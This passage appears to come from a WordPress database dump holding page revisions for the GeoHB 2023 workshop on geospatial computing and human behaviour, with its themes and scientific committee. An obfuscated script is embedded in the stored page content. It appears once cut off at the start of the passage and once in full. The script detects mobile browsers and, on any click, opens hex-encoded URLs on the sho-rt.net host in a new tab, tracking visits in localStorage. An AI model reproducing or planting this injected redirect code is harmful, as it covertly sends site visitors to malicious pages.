_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:32:02','2023-01-01 19:32:02','',3497,'https://gsw2023.com/?p=3527',0,'revision','',0),
(3528,1,'2023-01-07 13:54:01','2023-01-07 13:54:01','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n</ul>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 13:54:01','2023-01-07 13:54:01','',2791,'https://gsw2023.com/?p=3528',0,'revision','',0),
(3529,1,'2023-01-07 13:56:09','2023-01-07 13:56:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]<strong>Themes of event:</strong></p>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental 